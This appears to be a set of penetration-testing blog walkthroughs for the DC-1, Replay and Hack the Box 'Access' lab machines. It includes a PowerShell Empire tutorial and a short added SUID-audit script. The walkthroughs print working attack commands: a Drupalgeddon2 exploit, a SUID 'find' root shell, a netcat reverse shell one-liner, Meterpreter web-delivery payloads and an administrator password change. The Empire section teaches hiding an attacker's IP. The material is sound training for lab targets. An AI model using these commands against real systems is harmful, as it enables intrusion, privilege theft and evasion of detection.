[Guide] How to DC-1: Vulnhub Walkthrough
Hello friends! Today we are going to take another boot2root challenge known as “DC-1: 1”. The credit for making this VM machine goes to “DCAU” and it is another boot2root challenge in which our goal is to get root access to complete the challenge. You can download this VM [To see content please register here].

Security Level: Beginner
Penetrating Methodology:
  • IP Discovery using netdiscover
  • Network scanning (Nmap)
  • Surfing HTTPS service port (80)
  • Finding Drupal CMS
  • Exploiting Drupalgeddon2 to get a reverse shell
  • Finding files with SUID bit set
  • Finding the “find” command with SUID bit set
  • Getting root shell with “find” command
  • Getting final flag
Walkthrough
Let’s start off with scanning the network to find our target.
netdiscover

[Image: 0.png?w=687&ssl=1]
We found our target –> 192.168.1.104
Our next step is to scan our target with nmap.
nmap -sV 192.168.1.104

[Image: 1.png?w=687&ssl=1]
The NMAP output shows us that there are 3 ports open: 22(SSH), 80(HTTP), 111(RPC)
We find that port 80 is running http, so we open the IP in our browser.
[Image: 2.png?w=687&ssl=1]
When we access the web service we find that the server is running Drupal CMS. As the target system is running Drupal CMS, we can check if it is vulnerable to the Drupalgeddon2 exploit. We run the exploit using Metasploit on the target machine and are successfully able to get a reverse shell.
msf5 > use exploit/unix/webapp/drupal_drupalgeddon2
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > set rhosts 192.168.1.104
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > run

After getting a reverse shell we spawn a TTY shell using python. Then we find a file with suid permission on the server and find that the “find” command has SUID bit set.
python -c 'import pty; pty.spawn("/bin/bash")'
find / -perm -u=s -type f 2>/dev/null

[Image: 3.png?w=687&ssl=1]
As the “find” command has the SUID bit set, we can execute the command as the “root” user. We create a file called “raj” and use the “find” command to check if it is executing the commands as the root user. The reason for creating a file is so that we can use it with the “find” command, as running it with a single file will run the command only once.
After executing the command “whoami”, we find that we can run commands as root user. We now execute “/bin/bash” using “find” command and are successfully able to spawn a shell as root user. We now go to /root directory and find a file called “thefinalflag.txt”. We take a look at the content of the file and find a congratulatory message for completing the VM.
touch raj
find raj -exec "whoami" \;
find raj -exec "/bin/sh" \;

[Image: 4.png?w=687&ssl=1]

This is our fourth article in the Empire series. In this article we learn to use the hop payload in PowerShell Empire. Empire has an inbuilt listener named http_hop which allows us to redirect our traffic to another of our active listeners after getting an agent. Thus the name hop, as it hops the agent from one listener to another in order to redirect traffic.
Similar to Metasploit, the hop listener in Empire uses a hop.php file. When you activate the hop listener, it will generate three PHP files that will redirect your existing listener. Place the said files on your jump server (Ubuntu) and then set up your stager accordingly to get the session through the mediator, i.e. our hop listener.
In the following image, you can see our Kali’s IP. Now, we will try to take a Windows session via Ubuntu using the http_hop payload in order to hide our own IP, i.e. basically, our http_hop payload will help us (the attacker) to avoid getting caught.
[Image: 1.png?w=687]
Here, in the following image, you can see our ubuntu’s IP too.
[Image: 2.png?w=687]
Now, let’s get started. First, we should have a simple http listener, for that type :
uselistener http
execute

[Image: 3.png?w=687]
Now, start the http_hop listener by typing :
uselistener http_hop
set RedirectListener http
set Host //192.168.1.111

Here, we have given RedirectListener i.e. all the traffic from http listener will be directed to the http_hop listener.
[Image: 4.png?w=687]
Executing the above listener will create three files as you can see that in the image above. Transfer these files to /var/www/html location of your Ubuntu as shown in the image below :
[Image: 6.png?w=687]
Now, you can see in the image below we have activated two listeners :
[Image: 7.1.png?w=687]
Let’s start our stager by typing the following commands :
usestager windows/launcher_bat
set Listener http_hop
execute

[Image: 7.png?w=687]
Once our bat file is executed on the target PC, we will have our session. Now, if you observe, the IP through which we have obtained the session is that of Ubuntu and not of Windows, but we have access to a Windows PC. Similarly, in Windows, it will show that the attacking machine is Ubuntu and not Kali. Hence our http_hop is effective.
[Image: 8.png?w=687]
In conclusion, the major advantage of the http_hop listener is that it helps keep an attacker from being identified on the target PC, as the said listener hides the original IP.

Hello friends! Today we are going to take another boot2root challenge known as “Replay: 1”. The credit for making this VM machine goes to “c0rruptedb1t” and it is another boot2root challenge in which our goal is to get root access to complete the challenge. You can download this VM [To see content please register here].

Security Level: Intermediate
Flags: There is one flag (flag.txt).
Penetrating Methodology:
  • IP Discovery using netdiscover
  • Network scanning (Nmap)
  • Surfing HTTPS service port (80)
  • Enumerating password from Source code.
  • Enumerating robots.txt and finding the zip file
  • Unzipping zip file
  • Enumerating password from the binary file
  • Enumerating the hardcoded command
  • Editing the hardcoded command
  • Getting a reverse shell
  • Enumerating password for the user
  • Elevate Privileges to get root
  • Getting Flag
Walkthrough
Let’s start off with scanning the network to find our target.
netdiscover

[Image: 0.png?w=687&ssl=1]
We found our target –> 192.168.1.37
Our next step is to scan our target with nmap.
nmap -p- -A 192.168.1.37

[Image: 1.png?w=687&ssl=1]
The NMAP output shows us that there are 3 ports open: 22(SSH), 80(HTTP), 1337(Unknown)
[Image: 2.png?w=687&ssl=1]
We find that port 80 is running http, so we open the IP in our browser.
We take a look at the source code of web page and at the top of the source code, we find a string inside a comment. We are not able to do anything with it, so we save it for later.
[Image: 3.png?w=687&ssl=1]
Nmap scan shows us that there is one entry inside robots.txt. We open robots.txt and find an entry called “/bob_db.zip”.
[Image: 4.png?w=687&ssl=1]
We open the link and download the zip file from the web server. After downloading the file, we extract it and find 64-bit ELF file and a text file. We take a look at the content of the text file and don’t find anything of use.
[Image: 5.png?w=687&ssl=1]
When we run the application “client.bin”, it asks for an IP address and a password.
[Image: 6.png?w=687&ssl=1]
As we have no clue for the password, we check the strings inside the application and there we find a hint for the password. Inside the application, we find the second half of the password. Now earlier inside the web page, we found a strange string that might be the first half of the password.
Password: qGQjwO4h6gh0TAIRNXuQcDu9Lqsyul
[Image: 7.png?w=687&ssl=1]
We join the strings and use the result as a password for the application. After giving the password, we are successfully able to log in, and find that we can run commands. But when we type a command we get an error stating that we are sending unauthorized packets and the connection gets closed.
[Image: 8.png?w=687&ssl=1]
Now when we take a closer look at the application we find that the command “;whoami” is hardcoded in the application.
[Image: 9.png?w=687&ssl=1]
We try to edit the application and change “;whoami” command to something else and find that the size of string inside the application should remain the same and the command should always start with a semi-colon. So we changed the “;whoami” to “;uname -a” keeping the number of characters inside the application the same by replacing existing characters inside the application.
[Image: 10.png?w=687&ssl=1]
Now when we run the application and give the password we are successfully able to execute our command.
[Image: 11.png?w=687&ssl=1]
Now we replace the entire string with our netcat reverse shell one-liner and used extra characters to keep the size of the application the same.
nc -e /bin/bash 192.168.1.25 4444;ls;ls;ls;ls;ls;ls;ls;

[Image: 14.png?w=687&ssl=1]
Now we run the application and give the correct password.
[Image: 15.png?w=687&ssl=1]
We setup our listener and are successfully able to get a reverse shell. After getting a reverse shell we spawn a TTY shell using python.
nc -lvp 4444
python -c 'import pty;pty.spawn("/bin/bash")'

[Image: 16.png?w=687&ssl=1]
Enumerating through the directories inside “~/Documents/.ftp” we find a file called “users.passwd”. We open it and find the password for user “bob”. Now we check the sudoers list and find that we can run all commands as root user.
sudo -l

[Image: 17.png?w=687&ssl=1]
As we have the password for user bob, we spawn a shell as the root user. We go to “/” directory and find a file called “flag.txt”. We take a look at the content of the file and find the congratulatory flag.
sudo -i
cd /
cat flag.txt

[Image: 18.png?w=687&ssl=1]

Today we are going to solve another CTF challenge, “Access”. It is a retired vulnerable lab presented by Hack the Box for helping pentesters to perform online penetration testing according to their experience level; they have a collection of vulnerable labs as challenges, from beginner to expert level.
Level: Easy
Task: To find user.txt and root.txt file
Note: Since these labs are online available therefore they have a static IP. The IP of Access is 10.10.10.98.
Penetrating Methodologies:
  • Network scanning (nmap).
  • Logging in FTP using Anonymous Login.
  • Using strings to read contents of the .mdb file.
  • Unzipping Zip file using 7z.
  • Using readpst to read the contents of the .pst file.
  • Finding Login Credentials
  • Logging into Telnet.
  • Finding the first flag user.txt
  • Using web delivery module to create PowerShell code.
  • Getting Meterpreter.
  • Using exploit suggester of Metasploit.
  • Getting Root Access.
  • Changing the Administrator password using net user.
  • Reading Our Final flag root.txt
Walkthrough
Let’s start off with scanning the network to find our target.
nmap -p- -A 10.10.10.98

[Image: 1.png?w=687&ssl=1]
The first thing that got our attention is that we have anonymous access to the ftp server. Let’s login and see what we find.
After successfully logging into FTP server, we have enumerated directories from where we have downloaded two files Access Control.zip and backup.mdb. They might come in handy later on.
ftp 10.10.10.98

When we tried to unzip the zip file, we found out that it was password protected. So we tried to open the backup.mdb file and found a password to the zip file.
strings backup.mdb | grep access

[Image: 4.png?w=687&ssl=1]
Once we have obtained the password for Access Control.zip, it is time to unzip it. After unzipping, we saw it's a .pst, which is a Microsoft Exchange format for mailboxes. Using readpst, we converted the file into the .mbox format.
7z x Access\ Control.zip
readpst 'Access Control.pst'

Let’s read the contents of the Access Control.mbox.
less 'Access Control.mbox'

[Image: 5.png?w=687&ssl=1]
After reading the contents, we saw user credentials that are surely going to help us move ahead.
Username- security
Password- 4Cc3ssC0ntr0ller

[Image: 7.png?w=687&ssl=1]
Let’s log in to telnet using our new credentials. After enumerating through directories, we have found our first flag.
telnet 10.10.10.98
dir
cd Desktop
type user.txt

[Image: 8.png?w=687&ssl=1]
Let’s create a shellcode generated via the web delivery module of Metasploit.
use exploit/multi/script/web_delivery
set target 2
set payload windows/x64/meterpreter/reverse_tcp
set lhost 10.10.14.6
exploit

[Image: 9.png?w=687&ssl=1]
Now we will execute the PowerShell code generated via the web delivery module.
[Image: 10.png?w=687&ssl=1]
We have successfully got the meterpreter. Moving forward.
getuid
getsystem
sysinfo

[Image: 11.1.png?w=687&ssl=1]
After that, we used the exploit suggester, which gave us all the possible exploits for the operating system of the victim’s system.
use post/multi/recon/local_exploit_suggester
set session 1
exploit

[Image: 11.png?w=687&ssl=1]
Using the exploit ms16_014_wmi_recv_notif of Metasploit.
use exploit/windows/local/ms16_014_wmi_recv_notif
set lhost 10.10.14.6
set session 1
set lport 1234
exploit

Oh yeah! We have got the root access.
whoami

[Image: 12.png?w=687&ssl=1]
Now we changed the password for Administrator because we can use it to login via telnet.
net user
net user Administrator Ignite@123

[Image: 13.png?w=687&ssl=1]
Here we successfully logged in via Telnet and found our final flag.
telnet 10.10.10.98
login: administrator
password: Ignite@123
cd Desktop
type root.txt

[Image: 14.png?w=687&ssl=1]
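
A defensive follow-up to the DC-1 walkthrough above, added here and not part of the original post: a shell audit that lists SUID files under a directory, flags those whose name is on a list of tools that can run other commands (such as “find”), and can clear the SUID bit from the flagged ones. The list RISKY_SUID and the function names audit_suid, count_risky and strip_risky are assumptions of this example.

```shell
#!/bin/sh
# Added example: audit a directory tree for SUID files that can execute
# arbitrary commands, the misconfiguration shown with "find" in DC-1.
# RISKY_SUID is a constructed, non-exhaustive sample list (an assumption).
RISKY_SUID="find vim vi nano less more awk gawk sed perl python python2 python3 ruby bash sh dash env tar cp nmap"

# audit_suid ROOT: print "RISKY <path>" or "review <path>" for every file
# under ROOT that has the SUID bit set (stays on one filesystem).
audit_suid() {
    root="${1:-/}"
    find "$root" -xdev -type f -perm -4000 2>/dev/null |
    while IFS= read -r path; do
        name=$(basename "$path")
        verdict="review"
        for risky in $RISKY_SUID; do
            if [ "$name" = "$risky" ]; then
                verdict="RISKY"
                break
            fi
        done
        printf '%s %s\n' "$verdict" "$path"
    done
}

# count_risky ROOT: number of SUID files flagged as RISKY under ROOT.
count_risky() {
    audit_suid "$1" | grep -c '^RISKY ' || true
}

# strip_risky ROOT: remove the SUID bit from every RISKY file under ROOT.
strip_risky() {
    audit_suid "$1" | sed -n 's/^RISKY //p' |
    while IFS= read -r path; do
        chmod u-s "$path"
    done
}

# Run the audit only when a directory is passed on the command line.
if [ "$#" -gt 0 ]; then
    audit_suid "$1"
fi
```

Files reported as “review” are SUID but not on the sample list; compare them against the distribution's expected SUID set before changing anything.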